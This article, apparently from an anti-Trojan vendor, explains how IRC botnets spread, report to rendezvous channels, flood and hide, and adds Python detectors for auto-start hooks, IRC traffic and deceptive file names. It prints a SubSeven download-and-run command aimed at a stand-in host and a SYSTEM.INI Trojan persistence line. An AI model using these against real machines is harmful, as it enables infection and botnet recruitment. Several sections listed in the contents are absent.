1. What Is A Bot and What Is A Bot Not.
2. Chronology of IRC Bots.
3. The Distinct Types Of Bots.
4. The Stages Of Bot Distribution and Infection.
   a. Infection Techniques.
   b. The Initial Infection.
   c. The Bots Report For Duty.
   d. Ordering and Controlling The New Army.
   e. Green Eggs And Spam.
   f. Keeping The Army On The Move And Hiding Them.
5. Conclusions.
   a. Be Reasonably Paranoid.
   b. Use Current And Updated Anti Trojan Software.
6. Interviews Where We Leave Absolutely No Stone Unturned.
   b. Interview With Dalnet IRC Operator Barbara.
   c. Interview With Dalnet IRC Operator Melech.
   c. Interview With Dalnet #NoHack Operator Golcor.
   d. Interview With Mobman, The Author Of SubSeven.
7. Analysis.
   b. Analysis Of Single Binary Bots. Coming Soon.
   c. Analysis Of Socket Clone Bots. Coming Soon.
8. Screen Captures And Logs.
   b. IRC Channel Activity Logs.
1. What Is A Bot and What Is A Bot Not.

Firstly, the term Bot is derived from the word Robot, which in turn comes from the Czech word "robota", meaning forced labour or drudgery. Bot is a generic term used to describe an automaton or automated process, in both the real world and the computer world. Search engines use Bots to spider web sites, and online games such as Quake use Bots as artificial opponents. Bots do not need to eat, drink or sleep, and will relentlessly do their master's bidding until told to stop. The Bots we are covering are IRC Bots, and they operate in much the same manner. Bots are also commonly referred to as Zombies or Drones; these are incorrect terms, used mainly by the media because they create a much more fearsome image.

One of the first bots written for Unix machines was released as Eggdrop Bot, the name by which it is still known today. I am informed by the current head of development for Eggdrop Bot, Jeff Fisher, that Eggdrop was first created in 1993; it can be downloaded from www.eggheads.org.

Various Trojan Bots also have "bot" in the name given to them by their authors, for example SubSeven Bot, Bionet Bot, AttackBot, GT Bot, EvilBot and SlackBot, to name just a few specimens. In actuality a Zombie is a Unix process which has exited but whose parent has not yet reaped it, so it still occupies its process table slot, rather like a ghost. A drone is similar to a zombie, and is likewise not an accurate description of an IRC Bot.
2. Chronology of IRC Bots.

IRC Bots have existed for many years now and are certainly not, by any means, a new discovery. Eggdrop Bots for all flavours of Unix have been around for several years and were usually used to protect IRC channels in the owner's absence. Generally these Bots are used for valid and useful purposes, but as you can write your own TCL scripts for them, they have much scope to be used for malicious purposes as well. Versions of Eggdrop Bot for Windows also exist under the name Win Eggdrop. I have seen several versions for Windows that have been patched so that they run as an invisible process (as a Trojan). More information on Eggdrop Bots, along with a full range of scripts, can be found at www.eggheads.org.

Malicious Trojan Bots for Windows have existed for at least four years, with early known versions being Bots such as AttackBot, which was a precursor to the SubSeven Bot. The knowledge gained from the development of AttackBot, along with its code, was applied in a condensed form to the SubSeven Bot. You can find a description of AttackBot, albeit not an accurate one, at Dark-e, along with information regarding the SubSeven Trojan. Past articles have been written about specific types of Trojans that connect to IRC and launch DDoS (Distributed Denial of Service) attacks. One very good article on the subject can be found at Idefense (read the PDF Adobe Acrobat file), and also read this article by Idefense, which is an analysis of the SubSeven Trojan's ability to launch DDoS. Although it covers a version of SubSeven that is now nearly two years old and a little outdated, it was and still is very accurate in its assessment.
3. The Distinct Types of Bots.

IRC Bots come in several different flavours and for several different operating systems. For Windows, there are three specific types of Bots:

(1.) Bots that consist of a single binary, such as AttackBot, SubSeven, EvilBot, SlackBot etc.

(2.) Bots that use one or more binaries together with open source script files, normally based around mIRC 32, and commonly referred to as GT Bot (Global Threat). We cover these in a lot more detail here URL?? as they are the easiest to edit and to create new variants of, because they are open source mIRC scripted files.

(3.) Bots that are a backdoor in another program, such as Socket Clone Bots in mIRC, which cause mIRC to make two connections to the server when it is opened instead of the normal one. Scripted Worms such as Judgement Day created Socket Clones to propagate themselves.
4. The Stages Of Bot Distribution and Infection.

(a.) Infection Techniques.

Contrary to popular belief, Email attachments are not the most popular or effective way to spread Trojans. How many Trojans do you get in your Email account each day? Join any popular IRC server and you will receive a whole plethora of DCC file sends, adverts for web sites with infectious downloads, or even infectious HTML using the ActiveX exploit for Microsoft Internet Explorer. If your browser is not patched against these exploits it is very easy to drop a small Trojan onto the machine that visits the web page. The exploit is limited: only files of less than 34 kb can be dropped. IRC Bots of less than 10 kb compressed do exist and can easily be dropped (EvilBot is a mere 7 kb when compressed with UPX).

We have put together a demonstration of the browser exploit, and you can safely test your browser to see if you are affected by visiting the link we have created. URL If you are affected you will need to install the Microsoft critical update immediately.

A lot of the dropped files are Web Download Trojans, which are a one-shot deal: once executed they invisibly fetch a predetermined file from the web and execute it. This is how larger Bots or Trojans are installed onto machines. The most effective way to infect a machine is to use an exploit, or an existing infection, so that the user does not see or suspect anything. If you were sent a file and nothing appeared to happen when you ran it, you would very likely be suspicious, or know that you had most likely just run a Trojan.

A great many Bots scan for victims of other Trojans such as SubSeven. This has two distinct advantages for the hacker. Firstly, the Bots do the scanning of a lot of class C blocks, so the hacker neither scans from his own machine nor wastes his own bandwidth doing so. Secondly, the hacker can get his Bot onto machines that are already Trojan infected, on the premise that if the owner did not know they had one Trojan that nearly all Anti-Trojan/Anti-Virus applications detect, they certainly won't know they have another that none of these applications detect by signature. This, to a large degree, is why we use Generics as a second layer of defence against unknown Trojans. The SubSeven scan finds victims on the default ports and also exploits the old SubSeven master password, which works on all SubSeven 2.* versions up to, but not including, SubSeven 2.1.3 Bonus. Once a victim has been found and logged into, the update-from-web command (UFUhttp://downloadlocation.com/filetodownload.exe) is sent. On receiving it, SubSeven downloads the new file, runs it, and then removes itself.

The Leave Trojan/Worm was a recent specimen that exploited this loophole. URL Another common trick lately has been to scan for exploitable Windows 2000 IIS (Internet Information Server) machines and use the Unicode exploit to spawn an FTP server, onto which a Trojan of choice can then be uploaded.

We recently discovered a Botnet with just over 1800 of these machines active and online at any one time; again these were Windows 2000 machines with the IIS vulnerability. Considering that the infected hosts are not all likely to be online at the same time, this makes for a rather large Botnet. The binary they were running was quite crude but could generate a lot of malicious traffic, especially as a lot of the hosts had broadband connections or were *.EDU (University) hosts. These particular Bots were used effectively against EFNET (Eris Free Network), a group of linked IRC chat servers, in a recent DDoS (Distributed Denial Of Service) attack, generating huge amounts of malicious traffic to take down the IRC servers.

Bots are also configured to generate clones (multiple instances of themselves) that join other IRC servers and mass message users with URLs for infectious downloads. These most commonly come in the form of a fake warning alerting the user that they have an auto-sending Worm, Trojan or Virus infection, or as an advert for a free sex site, along with a few other disguises.

We recently witnessed a Botnet of just over 7000 infected machines, all infected with not one but two different Bots, GT Bot and Litmus Bot, which were spread by spamming IRC users and by autosends. Once infected with the Web Download Trojan, the infected machine would download a packaged executable created by a program called PaquetBuilder32 and execute it. This would install a GT Bot that connects to IRC.Dal.Net, joins target channels and autosends by DCC (Direct Client To Client protocol) a copy of the Web Downloader Trojan, which infects more machines. This works in two parts, with one Bot infecting other users to create more Bots and the other logging onto a different IRC server to report for duty for DDoS attacks. Over the course of our studies we have collected and assimilated a lot of information, IRC channel logs and screen captures showing all sorts of different Bot activity, including DDoS attacks.
(b.) The Initial Infection.

Once the Trojan is run it secretly installs itself and creates a method of restarting itself at boot. Commonly used are the run= or load= lines in WIN.INI, or the shell= line in SYSTEM.INI with the Trojan appended after explorer.exe, e.g. (shell=explorer.exe ,trojanbot.exe). Alternatively it loads from the Registry or from the Start Up folder.
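As an added example, not code from the original article: a small Python check for the WIN.INI and SYSTEM.INI hooks described above. The two INI texts are constructed samples and trojanbot.exe is the article's placeholder name; a real check would read the files from the Windows directory and would also have to cover the Registry and the Start Up folder, which this example does not.

```python
"""Flag Trojan auto-start hooks in WIN.INI and SYSTEM.INI.

Added example for section 4 (b); not code from the original article. The two INI texts
below are constructed, and trojanbot.exe is the article's placeholder name. A real check
would read them from the Windows directory and would also have to cover the Registry and
the Start Up folder, which this example does not.
"""
import re
from typing import Dict, List

IniData = Dict[str, Dict[str, List[str]]]   # section -> key -> values (keys can repeat)

def parse_ini(text: str) -> IniData:
    """Minimal Windows-style INI reader. configparser is avoided on purpose: real INI files repeat
    keys (several device= lines in [386Enh]) and treat section and key names case-insensitively."""
    sections: IniData = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].setdefault(key.strip().lower(), []).append(value.strip())
    return sections

# Windows accepts space and/or comma between programs on these lines (hence "explorer.exe ,trojanbot.exe").
# A path containing spaces is ambiguous here, for Windows as much as for this script.
_SEP = re.compile(r"[ ,]+")

def programs_on(values: List[str]) -> List[str]:
    return [p for v in values for p in _SEP.split(v) if p]

def win_ini_hooks(win_ini_text: str) -> List[str]:
    """run= and load= in [windows] are normally empty; anything there starts at logon."""
    windows = parse_ini(win_ini_text).get("windows", {})
    return [f"win.ini {key}={prog}" for key in ("run", "load") for prog in programs_on(windows.get(key, []))]

def system_ini_hooks(system_ini_text: str) -> List[str]:
    """shell= in [boot] should be exactly explorer.exe; any extra program is a hook."""
    boot = parse_ini(system_ini_text).get("boot", {})
    return [f"system.ini shell={p}" for p in programs_on(boot.get("shell", []))
            if p.lower().rsplit("\\", 1)[-1] != "explorer.exe"]   # compare the basename only

WIN_INI = """\
[windows]
load=C:\\WINDOWS\\trojanbot.exe
run=
NullPort=None
[Desktop]
Wallpaper=(None)
"""

SYSTEM_INI = """\
[boot]
shell=explorer.exe ,trojanbot.exe
mouse.drv=mouse.drv
[386Enh]
device=*vmouse
device=*vshare
"""

if __name__ == "__main__":
    for hook in win_ini_hooks(WIN_INI) + system_ini_hooks(SYSTEM_INI):
        print("suspicious auto-start:", hook)
```

Run against the constructed samples it reports the load= entry in WIN.INI and the second program on the shell= line; a shell= line carrying only explorer.exe, with any path or capitalisation, is left alone.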
(c.) The Bots Report For Duty.

When installed and running, the Bot will attempt to connect to an IRC server on a pre-designated port. The most common port is the default, port 6667. It should also be considered that IRC servers usually listen on several other ports by default, including 6660, 6661, 6662, 6663, 6664, 6665, 6666, 6668, 6669 and 7000. These other ports are often used so that the more commonly known port 6667 does not show up in Netstat as a remote port the computer is connected to.

Another thing that should be noted is that an IRC server is not limited to the ports listed above, and in fact can be set to listen on any port. IRCD versions for Windows are often configured to run on port 80 or other similar ports, which won't arouse too much suspicion as a remote port connection. Some BotNets run Trojanized Windows IRCDs such as Unreal IRCD 3.0 for Windows, which has been adapted to run as a hidden task under the process name Coresrv.exe and loads Coresrv.dat as the IRCD configuration file. This enables BotNets to be hidden on the machines of non-public providers, which are a lot harder to have removed than a simple complaint to a shell host provider. The user must first be contacted, which is no easy task, especially when it has to be done through the ISP, which often has little or no conception of what this stuff is or how it works. They most probably think emails of complaint are the ravings of some madman with an overactive imagination, and who could blame them, as a lot of it sounds too fantastic to be true.

Most BotNets are however forced to join public or private IRC servers hosted by commercial shell hosting companies operating on a Unix flavoured platform.

Once connected to IRC the Bot will log into the predetermined rendezvous channel to await further instructions from its Master.
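Because an IRCD can listen on any port, a practitioner looking for a Bot's connection cannot rely on the port number alone. The following Python, added here and not code from the original article, fingerprints the first bytes of a connection instead: IRC registration (NICK and USER, with an optional PASS) from the client side, or a NOTICE or numeric reply from the server side. The four flows are constructed; only the port list comes from the article.

```python
"""Spot an IRC session from its first bytes rather than from the port it uses.

Added example for section 4 (c); not code from the original article. The flows below
are constructed: IRC on the default port 6667, the same Bot registration on port 80
(the trick the article describes), an ordinary web request on port 80, and an
unrelated binary protocol on port 7000. Only the port list comes from the article.
"""
import re
from typing import List, NamedTuple

IRC_DEFAULT_PORTS = {6660, 6661, 6662, 6663, 6664, 6665, 6666, 6667, 6668, 6669, 7000}

class Flow(NamedTuple):
    remote_port: int
    client_bytes: bytes   # first bytes the local host sent
    server_bytes: bytes   # first bytes the remote host sent back

def _commands(payload: bytes, limit: int) -> List[str]:
    """Command word of each of the first `limit` lines, after dropping an RFC 1459 ':prefix'."""
    cmds = []
    for line in payload.split(b"\n")[:limit]:
        parts = line.split()
        if parts and parts[0].startswith(b":") and len(parts) > 1:
            parts = parts[1:]
        if parts:
            cmds.append(parts[0].decode("ascii", "replace").upper())
    return cmds

def looks_like_irc(flow: Flow) -> bool:
    """IRC registration is NICK + USER (PASS optional) within the first few client lines, and the
    server greets with NOTICE or a three-digit numeric reply; either side is enough."""
    client = _commands(flow.client_bytes, limit=4)
    server = _commands(flow.server_bytes, limit=8)
    registered = "NICK" in client and "USER" in client
    greeted = any(c == "NOTICE" or (len(c) == 3 and c.isdigit()) for c in server)
    return registered or greeted

_HTTP_REQUEST = re.compile(rb"^(GET|POST|HEAD) \S+ HTTP/1\.[01]\r?\n")

def classify(flow: Flow) -> str:
    """'irc-standard-port' / 'irc-nonstandard-port' when the payload is IRC; 'http' or 'other' otherwise.
    The port is only a hint: an IRCD can listen anywhere, so the verdict is driven by the payload."""
    if _HTTP_REQUEST.match(flow.client_bytes) or flow.server_bytes.startswith(b"HTTP/1."):
        return "http"
    if looks_like_irc(flow):
        return "irc-standard-port" if flow.remote_port in IRC_DEFAULT_PORTS else "irc-nonstandard-port"
    return "other"

SAMPLE_FLOWS = [  # constructed
    Flow(6667, b"NICK [GT]abc123\r\nUSER gt 0 0 :gt\r\n",
         b":irc.example.net NOTICE AUTH :*** Looking up your hostname...\r\n"),
    Flow(80, b"PASS letmein\r\nNICK [GT]abc123\r\nUSER gt 0 0 :gt\r\n",
         b":irc.example.net 001 [GT]abc123 :Welcome to the Internet Relay Network\r\n"),
    Flow(80, b"GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
         b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html>"),
    Flow(7000, b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00", b"\x15\x03\x01\x00\x02\x02\x28"),
]

if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        print(f"remote port {f.remote_port:5}: {classify(f)}")
```

The second flow is the interesting one: the same registration on port 80 is still classed as IRC, while a real web request on port 80 is not. The port only decides between the two IRC labels, which is the right way round for a connection that a Bot has deliberately put on an unusual port.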
(d.) Ordering and Controlling The New Army.

Often, as these Bots join the IRC channel, the Master will log into them with a special, and sometimes encrypted, access password. This ensures that the Bots cannot be controlled by other people and makes it harder for someone to hijack the BotNet. After the login has been accepted, if indeed one was required, the Bots are ready to be put to work. Our screen capture archive, obtained from undercover surveillance, shows much activity going on in these Bot channels, with lots of DDoS attacks and IRC floods being invoked. Even as I write I am witnessing channels on DALnet being heavily flooded by GT Bots, which hardly display any of the traits of sluggish and lifeless Zombies. As I sit here, so far over 50 different channels have been brought to a standstill by huge floods of data, where the Bot connects, sends a message to the channel, immediately disconnects, then reconnects and repeats the action in a loop until ordered to stop from the remote server. As this is of extra interest I have decided to also include screenshots of both the remote IRC channel where the orders are given and one of the channels which was attacked: the attack being launched here, and the results of the attack and what the victims saw here.

The screen captures from when I joined the channel to observe the BotNet, here and here, show the number of GT Bots in each of the channels. The channel modes should also be noted: they appear in the title bar of the channel window as +mnprtu, and are set that way to hide the nicknames of the Bots in the channel from the user list on the right hand side of the image. We will be covering channel modes and what they mean and do in section 4 (f.) of this article.
(e.) Green Eggs And Spam.

An idea of how Bots are used to spam becomes obvious when you look at this image here, showing GT Bots being commanded to spam a remote IRC network with fake virus warnings urging people to go and download a fake cure, which in fact infects them with a GT Bot. This is a common and effective strategy amongst BotNet owners, playing on normal users' fears and concerns. These Bots are normally joined into popular channels with several hundred people in them and message everybody as they join with a spam message such as the one in the above image. They are able to generate huge amounts of spam per session and infect many users, which increases the head count of the BotNet and of course makes any attacks launched more devastating.
(f.) Keeping The Army On The Move And Hiding Them.

BotNets often draw attention to themselves through traffic patterns which are soon picked up on by vigilant IRC administrators or shell providers, and the channels they join are closed or the shell account removed following an abuse complaint. If they joined a fixed IRC server name or IP address, the likelihood is that they would all be lost through some basic action on the part of the service providers.

This is why BotNets often follow dynamic hosts, which are quick and easy to edit to repoint the entire army elsewhere if it is accidentally stumbled upon or banned from an IRC server or channel. If the dynamic address that the Bots follow can be identified, then it is not too hard to complain to the provider of the dynamic account and request that it be null routed. The smart money is always on going after the dynamic DNS, if you can recover the information as to which dynamic hostname is being used.

A common provider of free dynamic accounts is dyndns.org. These accounts can be and are used for many legitimate purposes, but are also unfortunately prone to misuse by some users. Dyndns has strong terms of service governing these accounts and abuse of them. In our experience with dyndns, the abuse department rigidly enforces their policies and terminates abused accounts promptly when proof of abuse is provided. You will find here one example of how abuse was handled without a report even being made to the abuse department. here

When the Bots are connected to the IRC server, the channel they join is usually set with various channel modes to restrict access or to help conceal the fact that the channel, or its occupants, are there. Unreal IRCD, which is a popular choice with BotNet Masters, covers the channel modes in its own commands document, so I will refer to that rather than do a complete rewrite. here You may notice from the images in the gallery here the modes the channel is set to, and be able to quickly reference them from the Unreal IRCD document about halfway down.

Typically the channels will be set with at least these modes:

+s (secret: the channel cannot be seen in the channel list)
+u (the userlist is hidden)
+m (moderated: a user cannot send text to the channel unless they have operator @ status or +v voice)
+k (keyed: you cannot enter the channel unless you know the correct key)
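To tie sections 4 (c), (d) and (f) together, here is an added Python example, not code from the original article, that replays a captured Bot session: it parses the raw IRC lines (RFC 1459 format), tracks the rendezvous channel and its mode changes, including the parameter-taking modes such as +k and +l that a naive string scan gets wrong, and picks out the Master's login. The session is constructed; the nick, server, channel, key and the ".login" and ".clone" command words are made up and do not reflect any particular Bot's real syntax.

```python
"""Replay a captured Bot/IRC session: rendezvous channel, its modes and the Master's login.
Added example for sections 4 (c), (d) and (f); not code from the original article. The
session below is constructed: nick, server, channel, key and the ".login"/".clone" command
words are made up and do not reflect any particular Bot's real syntax. ">" = sent by the
Bot, "<" = received from the server."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

@dataclass
class Message:
    prefix: Optional[str]
    command: str
    params: List[str]

def parse_line(line: str) -> Message:
    """Parse an RFC 1459 message: [':'prefix ' '] command {' 'param} [' :'trailing]."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")  # the first " :" starts the trailing parameter
    params = head.split()
    if sep:
        params.append(trailing)
    return Message(prefix, params[0].upper(), params[1:])

# Mode letters that consume an argument (Unreal IRCD conventions, the IRCD the article discusses)
PARAM_ALWAYS = set("ovhbeqk")  # o/v/h take a nick, b/e/q a mask, k the key (Unreal wants it on -k too)
PARAM_ON_SET = {"l"}           # +l takes a user limit, -l takes nothing

def apply_mode_change(modes: Dict[str, Optional[str]], args: List[str]) -> Dict[str, Optional[str]]:
    """Apply a MODE argument list such as ['+mnprtu'] or ['-l+k', 'key'] to a channel's modes.
    Nick and mask modes consume their argument but are not stored: they describe a user, not the channel."""
    modes, adding, i = dict(modes), True, 1  # args[0] is the mode string, args[1:] its parameters
    for ch in (args[0] if args else ""):
        if ch in "+-":
            adding = ch == "+"
            continue
        arg = None
        if ch in PARAM_ALWAYS or (adding and ch in PARAM_ON_SET):
            arg = args[i] if i < len(args) else None
            i += 1
        if ch in "ovhbeq":
            continue
        if adding:
            modes[ch] = arg
        else:
            modes.pop(ch, None)
    return modes

@dataclass
class BotSession:
    nick: Optional[str] = None
    server: Optional[str] = None
    channels: Dict[str, Dict[str, Optional[str]]] = field(default_factory=dict)
    logins: List[Tuple[str, str]] = field(default_factory=list)    # (sender, text)
    commands: List[Tuple[str, str]] = field(default_factory=list)  # other channel traffic

LOGIN_RE = re.compile(r"^[.!]?(login|auth|pass)\b", re.I)  # assumed login verbs; real Bots vary

def replay(session: List[Tuple[str, str]]) -> BotSession:
    s = BotSession()
    for direction, raw in session:
        m = parse_line(raw)
        if m.command == "NICK" and direction == ">":
            s.nick = m.params[0]
        elif m.command == "001":  # RPL_WELCOME: prefix is the server, params[0] our nick
            s.server, s.nick = m.prefix, m.params[0]
        elif m.command == "JOIN" and direction == ">":
            for chan in m.params[0].split(","):
                s.channels.setdefault(chan, {})
        elif m.command == "324" and len(m.params) > 2:  # RPL_CHANNELMODEIS: nick chan modes [args]
            s.channels[m.params[1]] = apply_mode_change(s.channels.get(m.params[1], {}), m.params[2:])
        elif m.command == "MODE" and m.params and m.params[0].startswith("#"):
            s.channels[m.params[0]] = apply_mode_change(s.channels.get(m.params[0], {}), m.params[1:])
        elif m.command == "PRIVMSG" and direction == "<" and m.params:
            sender, text = (m.prefix or "").split("!", 1)[0], m.params[-1]
            (s.logins if LOGIN_RE.match(text) else s.commands).append((sender, text))
    return s

STEALTH = "sumk"  # the four modes the article lists as the minimum on a Bot channel

def stealth_report(s: BotSession) -> Dict[str, str]:
    """Which of +s +u +m +k each channel has set, as a string of mode letters."""
    return {chan: "".join(m for m in STEALTH if m in modes) for chan, modes in s.channels.items()}

SESSION = [  # constructed capture
    (">", "NICK [GT]h4x0r"),
    (">", "USER gtbot 0 0 :gtbot"),
    ("<", ":irc.example.net 001 [GT]h4x0r :Welcome to the Internet Relay Network [GT]h4x0r"),
    (">", "JOIN #drones k3y"),
    ("<", ":[GT]h4x0r!gtbot@host.example JOIN :#drones"),
    ("<", ":irc.example.net 324 [GT]h4x0r #drones +mnprtusk k3y"),
    ("<", ":Master!m@master.example PRIVMSG #drones :.login s3cret"),
    ("<", ":Master!m@master.example PRIVMSG #drones :.clone irc.victim.example 6667 20"),
    ("<", ":Master!m@master.example MODE #drones +l 300"),
    ("<", ":Master!m@master.example MODE #drones -l+i"),
]
```

Calling replay(SESSION) yields the Bot's nick and server, the channel #drones with the key "k3y" recovered from the 324 reply, the later +l and -l+i changes applied in order, and the Master's ".login" line separated from the other commands; stealth_report then shows that all four of +s, +u, +m and +k are set. The login pattern is an assumption, so on a real capture expect to adjust it to whatever verb the Bot in hand uses.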
5. Conclusions.

(a.) Be Reasonably Paranoid.

People should be reasonably paranoid about accepting any files over the Internet from chatrooms, or visiting web sites that they do not know, without at least checking that their web browser is updated with the latest critical updates if they use Microsoft Internet Explorer. Test the security of your Internet Explorer here.

Many files are spread on IRC as *.MPEG.zip or *.MPEG.exe, and other similar names, to fool people into accepting them. Even scanning files with Anti-Virus scanners is not always a good enough defence, as unknown Trojans would not be identified. Additional references here, here and here.

You can also download our totally free Trojan, Bot, Zombie and Worm scanner, Swat It, from here.
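The *.MPEG.exe trick works because Windows Explorer hides the last extension of a "known file type" by default, so the user sees a media file name. The Python below is an added example, not code from the original article, that shows what such a name displays as and flags the deceptive double extension; the extension sets are the editor's choice rather than a list from the article.

```python
"""Spot the double-extension lure described above (e.g. *.MPEG.exe) and show what Windows displays.

Added example for section 5 (a); not code from the original article. The extension sets
are the editor's choice, not a list from the article.
"""
import os
from typing import NamedTuple

# Extensions Windows runs when double-clicked; the lure relies on the last one being one of these.
EXECUTABLE = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js", ".hta", ".lnk"}
# Archives: not run directly, but the article notes *.MPEG.zip is used to carry the executable.
ARCHIVE = {".zip", ".rar", ".ace"}
# What the lure pretends to be; these are "known file types" whose extension Explorer hides by default.
MEDIA = {".mpeg", ".mpg", ".avi", ".asf", ".mp3", ".wav", ".jpg", ".jpeg", ".gif", ".bmp", ".txt"}

class Verdict(NamedTuple):
    displayed_name: str   # name a user with "Hide file extensions for known file types" sees
    kind: str             # "executable", "archive" or "other"
    deceptive: bool       # a media-looking inner extension in front of an executable/archive one

def assess_filename(name: str) -> Verdict:
    base, ext = os.path.splitext(name)
    ext = ext.lower()
    inner = os.path.splitext(base)[1].lower()
    if ext in EXECUTABLE:
        kind = "executable"
    elif ext in ARCHIVE:
        kind = "archive"
    else:
        kind = "other"
    # Explorer hides the final extension when it is a registered type, so "clip.MPEG.exe" shows as "clip.MPEG"
    displayed = base if ext in EXECUTABLE | ARCHIVE | MEDIA else name
    deceptive = kind != "other" and inner in MEDIA
    return Verdict(displayed, kind, deceptive)

SAMPLE_NAMES = ["holiday.MPEG.exe", "trailer.mpg.scr", "clip.MPEG.zip", "song.mp3", "setup.exe", "README"]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        v = assess_filename(n)
        print(f"{n:20} shows as {v.displayed_name:16} {v.kind:10} {'DECEPTIVE' if v.deceptive else ''}")
```

A plain setup.exe is executable but not deceptive, and a genuine song.mp3 is neither; only the names that hide an executable or archive behind a media extension are flagged, which is the judgement a DCC-accept policy or a mail gateway needs to make.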
(b.) Use Current And Updated Anti Trojan Software.

It is very important to remember that, no matter which Anti-Virus or Anti-Trojan software you use, you keep it regularly updated, as new Trojans appear on a daily basis. A check for file signature updates should be done daily, unless you are using our software, which negates the need to check as it updates automatically when new file signatures are available.
